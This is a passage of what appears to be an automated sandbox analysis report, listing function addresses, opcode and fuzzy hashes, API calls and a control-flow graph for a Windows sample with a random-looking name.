                                                    Function 00007FFAAC68B029 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9905d8931b3fb022763f3fd36d0752476bc674690d22611208432c51b7c1fa53
                                                    • Instruction ID: 2b7185eace67504b3816d194571f1b12b594496d8e86c7ebcb0a9a78b74b5efe
                                                    • Opcode Fuzzy Hash: 9905d8931b3fb022763f3fd36d0752476bc674690d22611208432c51b7c1fa53
                                                    • Instruction Fuzzy Hash: 90112A70808A8D8FDF85EF68C859AA97FF0FF69300F0405AAE418D72A1D735D544CB81
                                                    Function 00007FFAACDB3219 Relevance: .0, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19d36a7119162503e98d4f95cde6d64ea090b460641c6b6095ff9b57310003ff
                                                    • Instruction ID: c71fe5a96d89c4cbaa6a5eef4ad7cd21f4755b8afcfad8436ef87843e4c647c9
                                                    • Opcode Fuzzy Hash: 19d36a7119162503e98d4f95cde6d64ea090b460641c6b6095ff9b57310003ff
                                                    • Instruction Fuzzy Hash: 3301C031909A8C8FEB56EB28C8595A97FB0EF56300F4540EBD41DC7192DE35E958C781
                                                    Function 00007FFAAC650C48 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6d465b056ea26ecf1fded2be63ec37227280e1c94df62f99a48a4034df729cc
                                                    • Instruction ID: 65046de3cec229e66b1876d8e45fa63e0aadb7fc00ec28093e9a4e0316d2411b
                                                    • Opcode Fuzzy Hash: a6d465b056ea26ecf1fded2be63ec37227280e1c94df62f99a48a4034df729cc
                                                    • Instruction Fuzzy Hash: C411A57590E69D8FF702DB64C8151E97B70EF43310F0495BAD145DB1D2DA38A908C781
                                                    Function 00007FFAAC685299 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e8dffb9ca4a016139f7af68e6fc51db6212075f4f92cfc88404b5503376b2903
                                                    • Instruction ID: 804cfade16d5fd21254c47d0fa6dcc2785a0d41fded00e26cb193a398c7b7ff3
                                                    • Opcode Fuzzy Hash: e8dffb9ca4a016139f7af68e6fc51db6212075f4f92cfc88404b5503376b2903
                                                    • Instruction Fuzzy Hash: 5B01527180968D8FFB46EF64C8556E97FA0EF56300F4160B6E40CC2192DB39A5588781
                                                    Function 00007FFAACDB3279 Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d20e83ada4975710434cc18d2d2654c9d3f9eb58e2be48ed758fa74b0e82ae84
                                                    • Instruction ID: 53eab08dcbe7d77d117ad7bf582072abcc3f9ca68c7996ad4ca6b57115a7968f
                                                    • Opcode Fuzzy Hash: d20e83ada4975710434cc18d2d2654c9d3f9eb58e2be48ed758fa74b0e82ae84
                                                    • Instruction Fuzzy Hash: 0C018470908A8C8FDB85DF18C855AAA7FF0FF65301F0540DAD408C7192DB35D954CB80
                                                    Function 00007FFAACDB042A Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6fbd03f7c8e337f00767d2c178156ca45fc4e2ae1b242fc23a7002d5e42d95c
                                                    • Instruction ID: 3c79a59879ebc666ac0690d3ba61391bea8dd4dd192dc447b4715dfa52be556c
                                                    • Opcode Fuzzy Hash: a6fbd03f7c8e337f00767d2c178156ca45fc4e2ae1b242fc23a7002d5e42d95c
                                                    • Instruction Fuzzy Hash: 7F0144B590855D8FEF94EB24D451FA8BBB1EF1A300F6441ACD44DD7292CD24A985CB50
                                                    Function 00007FFAACDAD9C7 Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 970de07edf6dfbc7a4dbb581517d125f1639d3ac1a3fcd1c6bd29d44ef5ba904
                                                    • Instruction ID: a852709cada7cee47f7f5853ac2536a3174bccb1f19a09b27ef88d361cf122ea
                                                    • Opcode Fuzzy Hash: 970de07edf6dfbc7a4dbb581517d125f1639d3ac1a3fcd1c6bd29d44ef5ba904
                                                    • Instruction Fuzzy Hash: BF01C270E1991DDEDB94DF18C880BACB7B1FB68704F5081A9D04EE7250CA30A984CF54
                                                    Function 00007FFAACDADA0C Relevance: .0, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbf063841edc49e74a6d192d360ca2454f272cf70f7f99406e8b90d513bd98a0
                                                    • Instruction ID: aedaf97e3a4eed1251f4c5e6a9615316e66ab4a33d508541f9138f826ee8f352
                                                    • Opcode Fuzzy Hash: cbf063841edc49e74a6d192d360ca2454f272cf70f7f99406e8b90d513bd98a0
                                                    • Instruction Fuzzy Hash: 23017270A09A1C9FDF98DF18D894FA8B7B1FB68304F1081AAD04EE7251CB719A84CF04
                                                    Function 00007FFAAC6506AD Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 32fe38c3e9ca56ef8784e158badd50216d3a2b4a730a4093dd0b64781d18dc8a
                                                    • Instruction ID: 7a168cdfc3e3295ac570aeb97b1ce18aa0f8d01639628d5a90066aeebb056e9e
                                                    • Opcode Fuzzy Hash: 32fe38c3e9ca56ef8784e158badd50216d3a2b4a730a4093dd0b64781d18dc8a
                                                    • Instruction Fuzzy Hash: D9F01D70905A4E9FEB85EF28D4496EEB7A0FF55305F10A476E40CC2190DA34E5A487C0
                                                    Function 00007FFAACDB355D Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b5aabef791239601195ab7b4aa21315e893f873798683a13d6b837bbd758347
                                                    • Instruction ID: 95490d86b52db99d27e4d2cee26c9eaf03ca318b03cf8069bec91460105f790c
                                                    • Opcode Fuzzy Hash: 9b5aabef791239601195ab7b4aa21315e893f873798683a13d6b837bbd758347
                                                    • Instruction Fuzzy Hash: 6DF02B71C4D68CCFFB229BA888551F87FA0EF42300F4441BBE01C85093DE69A558C782
                                                    Function 00007FFAAC651398 Relevance: .0, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c7c09b0a558b0acc5a0ce9b47f2b07873629deb4af0dfeb1b0aeea53ac3fd37
                                                    • Instruction ID: d5f64f75febf4d0b183507d2b2ed2b00da77ee95e09095a2644b20b58249ef26
                                                    • Opcode Fuzzy Hash: 6c7c09b0a558b0acc5a0ce9b47f2b07873629deb4af0dfeb1b0aeea53ac3fd37
                                                    • Instruction Fuzzy Hash: 0FF0977091894D9FDB84EF58D448AAA7BE4FF28301F104565E818C3250DA30E594CB81
                                                    Function 00007FFAAC6506D0 Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4338d3ba227f8c47ee7df20bc2f460401141b72d7e72fa1f11c16a5f30a6242d
                                                    • Instruction ID: 877f4d8d3382f3695607743e98908bc0f8294ecce1b424b8ebcb76b5d76b8a59
                                                    • Opcode Fuzzy Hash: 4338d3ba227f8c47ee7df20bc2f460401141b72d7e72fa1f11c16a5f30a6242d
                                                    • Instruction Fuzzy Hash: BDF01C7081594E9FEB85EF68C4496EEBBE0FF18305F50A466E81CD2150DB30A6A4CBC0
                                                    Function 00007FFAACDB17DA Relevance: .0, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 726f533fa739c932cfec5c7c34090d3aa062bd5a83cf0950b7ce67a7fe524656
                                                    • Instruction ID: 670360cdc8f15fb8cc13803c44750bb0814383a23711a57e5f23cec0f38ab7d7
                                                    • Opcode Fuzzy Hash: 726f533fa739c932cfec5c7c34090d3aa062bd5a83cf0950b7ce67a7fe524656
                                                    • Instruction Fuzzy Hash: 95E01223B1DE2C0B6698E66C78162FCA3C1E78863170143BFE44ED3396DD1A9D4242C5
                                                    Function 00007FFAACDAFD66 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction ID: 43a84c183d79e7da89431d45c17db64600817fd6830db57b4c91731e00516293
                                                    • Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction Fuzzy Hash: EAF03F30A0991D8FDFA9DB08C890BA9B7B1FB69300F1045DA800EE7250CA31AA84CF50
                                                    Function 00007FFAACDB80EB Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d5ec81ef8885838616d3c5236a447304b5d5448b2706501241893942e9dbc850
                                                    • Instruction ID: 59b5da63e9aa1c5faa7946516ad448bec5b318d9781ed0c074a62dacb6b25daf
                                                    • Opcode Fuzzy Hash: d5ec81ef8885838616d3c5236a447304b5d5448b2706501241893942e9dbc850
                                                    • Instruction Fuzzy Hash: 76F03A30E0460ACFEB84DF54C881ABEB7F1EF59310F10453AC429E3391DA38E9848B90
                                                    Function 00007FFAAC655A29 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction ID: 56f800dc6f0f3604e49753df569d0029cb20a885a48c4184b96d86093933dd55
                                                    • Opcode Fuzzy Hash: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction Fuzzy Hash: A8F0D07090952ECEFB65DB18D8447E976B0FB55304F20B4BCD14EA32C1DA789984CF45
                                                    Function 00007FFAAC65AE81 Relevance: .0, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7c437762e224626516861a5cc4ea5372ee7abd2b1bbc9eb27ed116ac9cfb81e
                                                    • Instruction ID: f4bf918e32f48520e6c1143d7992d10c9bc3373b8b4fbfb2d8f5e8f18af8aa6a
                                                    • Opcode Fuzzy Hash: c7c437762e224626516861a5cc4ea5372ee7abd2b1bbc9eb27ed116ac9cfb81e
                                                    • Instruction Fuzzy Hash: E6F0346190651E8FF7A4DB18C855ABDB7A1FB88240F2051F9C00EA26C2DE346E868F80
                                                    Function 00007FFAACDB08FC Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction ID: 8086fa6e96fa2cd831a39db4e1881ae207e6f700072460f6dd637b5442b18d8e
                                                    • Opcode Fuzzy Hash: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction Fuzzy Hash: 21E0C97190895D9FEFA9DB14C890EA8BBB0EF26300F2484DDC04ED7292DE30A985CF41
                                                    Function 00007FFAACDB17B8 Relevance: .0, Instructions: 17COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37d6d1ac7af4328821d4f5385ac1f0e3febeb8b629708a19e8b7554ecc42e762
                                                    • Instruction ID: 88a54555300d3c96d9821dbe577708d9b8615bda01e61733d1edca75a0d1260d
                                                    • Opcode Fuzzy Hash: 37d6d1ac7af4328821d4f5385ac1f0e3febeb8b629708a19e8b7554ecc42e762
                                                    • Instruction Fuzzy Hash: 94D0C955B19A0B86BEA8A669046757A12C2EBA6680B8084B9E41ED3686EC18EC4902C0
                                                    Function 00007FFAACDB0059 Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction ID: 04cca1e77179532c96177cb39d02250091adcf600c4f5110d5634aac36791fc7
                                                    • Opcode Fuzzy Hash: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction Fuzzy Hash: E0E04234E19A2D8EEBA4EF18C8417E9B3B1FB5A700F5041E5904DE3245CA34AE85CF81
                                                    Function 00007FFAACDA0BBB Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction ID: dfeb9b7d9bfe7770cc68de0b013bc9047cba62807207c4a8e61efd82f35e6f9d
                                                    • Opcode Fuzzy Hash: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction Fuzzy Hash: 1CD0C912B0F517CDF6785701422027E61909F07B04F24C43EC0BF619C1CE2CF40962C1
                                                    Function 00007FFAACDA00DF Relevance: .0, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction ID: 82756e6e46b4f74baffddd642cb09372ee955b509ebd71ce13babfef2b673e36
                                                    • Opcode Fuzzy Hash: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction Fuzzy Hash: 39C04C11F4F343DFF62557E4485113C26901F0FA45B5446B5D51F8A2C3D89CB85863A5
                                                    Function 00007FFAAC6536C4 Relevance: .0, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction ID: 7a7631306a418cebaf3c899fd67ad6b1175b3e8448158f51e11137849fcc9c2c
                                                    • Opcode Fuzzy Hash: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction Fuzzy Hash: 72A0122084A00BC5F221971440083BC10505F02344F20707C800D14281CD3890480A41

                                                    Non-executed Functions

                                                    Function 00007FFAAC6509B0 Relevance: 5.2, Strings: 4, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: f70d0f982a0d995bab07fe19af1c0b5607f8a86bf348a84dcacd7b9bded31570
                                                    • Instruction ID: 7b4d991c1b3f90524472fb2a8a7359a11591e8e60737d1575cd44c071575d68e
                                                    • Opcode Fuzzy Hash: f70d0f982a0d995bab07fe19af1c0b5607f8a86bf348a84dcacd7b9bded31570
                                                    • Instruction Fuzzy Hash: 0251D49BE0D56767E15233FCB4219EE9B44FF41779B08D63BD14EC92E34C08A88582D5

                                                    Execution Graph

                                                    Execution Coverage:6.7%
                                                    Dynamic/Decrypted Code Coverage:81.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:16
                                                    Total number of Limit Nodes:0
                                                    execution_graph 23404 7ffaac7f01a9 23405 7ffaac7f01b7 CloseHandle 23404->23405 23407 7ffaac7f0294 23405->23407 23400 7ffaac640710 23402 7ffaac653720 23400->23402 23401 7ffaac653acd VirtualAlloc 23403 7ffaac653b25 23401->23403 23402->23401 23408 7ffaac7f1e35 23409 7ffaac7f1e4f GetFileAttributesW 23408->23409 23411 7ffaac7f1f15 23409->23411 23392 7ffaac7f0040 23393 7ffaac7f007b ResumeThread 23392->23393 23395 7ffaac7f0154 23393->23395 23396 7ffaac7ee84d 23397 7ffaac7ee85b SuspendThread 23396->23397 23399 7ffaac7ee934 23397->23399

                                                    Executed Functions

                                                    Function 00007FFAACD9194F Relevance: 5.7, Strings: 4, Instructions: 737COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffaacd9194f-7ffaacd91962 1 7ffaacd91964-7ffaacd91ca5 0->1 2 7ffaacd919ae-7ffaacd919c4 0->2 8 7ffaacd91caf-7ffaacd91cee 1->8 4 7ffaacd91a54-7ffaacd91a84 2->4 5 7ffaacd919ca-7ffaacd919d2 2->5 16 7ffaacd91a8a-7ffaacd91a8b 4->16 17 7ffaacd91b2e-7ffaacd91b37 4->17 7 7ffaacd919d8-7ffaacd919ea 5->7 5->8 7->8 9 7ffaacd919f0-7ffaacd91a07 7->9 18 7ffaacd91cf0 8->18 12 7ffaacd91a47-7ffaacd91a4e 9->12 13 7ffaacd91a09-7ffaacd91a10 9->13 12->4 12->5 13->8 14 7ffaacd91a16-7ffaacd91a44 13->14 14->12 19 7ffaacd91a8e-7ffaacd91aa4 16->19 20 7ffaacd91b3d-7ffaacd91b43 17->20 21 7ffaacd91c6f-7ffaacd91c95 17->21 26 7ffaacd91cfb-7ffaacd91d91 18->26 19->8 23 7ffaacd91aaa-7ffaacd91ace 19->23 20->8 22 7ffaacd91b49-7ffaacd91b58 20->22 24 7ffaacd91c62-7ffaacd91c69 22->24 25 7ffaacd91b5e-7ffaacd91b65 22->25 27 7ffaacd91ad0-7ffaacd91af3 23->27 28 7ffaacd91b21-7ffaacd91b28 23->28 24->20 24->21 25->8 29 7ffaacd91b6b-7ffaacd91b75 25->29 34 7ffaacd91d16-7ffaacd91d96 26->34 35 7ffaacd91d9c-7ffaacd91ddf 26->35 27->8 36 7ffaacd91af9-7ffaacd91b1f 27->36 28->17 28->19 33 7ffaacd91b7c-7ffaacd91b87 29->33 37 7ffaacd91bc6-7ffaacd91bd5 33->37 38 7ffaacd91b89-7ffaacd91ba0 33->38 34->35 46 7ffaacd91d38-7ffaacd91d98 34->46 45 7ffaacd91de1-7ffaacd91e36 35->45 36->27 36->28 37->8 40 7ffaacd91bdb-7ffaacd91bff 37->40 38->8 42 7ffaacd91ba6-7ffaacd91bc2 38->42 44 7ffaacd91c02-7ffaacd91c1f 40->44 42->38 47 7ffaacd91bc4 42->47 44->8 48 7ffaacd91c25-7ffaacd91c40 44->48 61 7ffaacd91e41-7ffaacd91ee7 45->61 46->35 55 7ffaacd91d5c-7ffaacd91d9a 46->55 51 7ffaacd91c42-7ffaacd91c58 47->51 48->44 48->51 51->8 52 7ffaacd91c5a-7ffaacd91c5e 51->52 52->24 55->35 60 7ffaacd91d7d-7ffaacd91d90 55->60 73 7ffaacd92017-7ffaacd92034 61->73 74 7ffaacd91eed-7ffaacd92290 61->74 75 7ffaacd9203a-7ffaacd9203f 73->75 76 7ffaacd92341-7ffaacd923a8 73->76 78 7ffaacd92042-7ffaacd92049 75->78 83 7ffaacd92518 76->83 80 7ffaacd9204b-7ffaacd9204f 78->80 81 7ffaacd91fcc-7ffaacd92339 78->81 80->45 82 7ffaacd92055 80->82 81->76 85 7ffaacd920d3-7ffaacd920d6 82->85 83->83 86 7ffaacd920d9-7ffaacd920e0 85->86 87 7ffaacd920e6 86->87 88 7ffaacd92057-7ffaacd9208c call 7ffaacd91ce0 86->88 89 7ffaacd92156-7ffaacd9215d 87->89 88->76 94 7ffaacd92092-7ffaacd920a2 88->94 91 7ffaacd920e8-7ffaacd9211a call 7ffaacd91ce0 89->91 92 7ffaacd9215f-7ffaacd921a5 89->92 91->76 100 7ffaacd92120-7ffaacd92148 91->100 107 7ffaacd91f74-7ffaacd91f78 92->107 108 7ffaacd921ab-7ffaacd921b0 92->108 94->45 97 7ffaacd920a8-7ffaacd920c5 94->97 97->76 99 7ffaacd920cb-7ffaacd920d0 97->99 99->85 100->76 102 7ffaacd9214e-7ffaacd92153 100->102 102->89 110 7ffaacd91fca 107->110 111 7ffaacd91f7a-7ffaacd92318 107->111 109 7ffaacd92236-7ffaacd9223a 108->109 112 7ffaacd921b5-7ffaacd921e4 call 7ffaacd91ce0 109->112 113 7ffaacd92240-7ffaacd92246 109->113 110->78 112->76 117 7ffaacd921ea-7ffaacd921fa 112->117 117->61 118 7ffaacd92200-7ffaacd9220f 117->118 118->76 119 7ffaacd92215-7ffaacd92228 118->119 119->86 120 7ffaacd9222e-7ffaacd92233 119->120 120->109
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4S$r6S$r6S$r6S
                                                    • API String ID: 0-2602100741
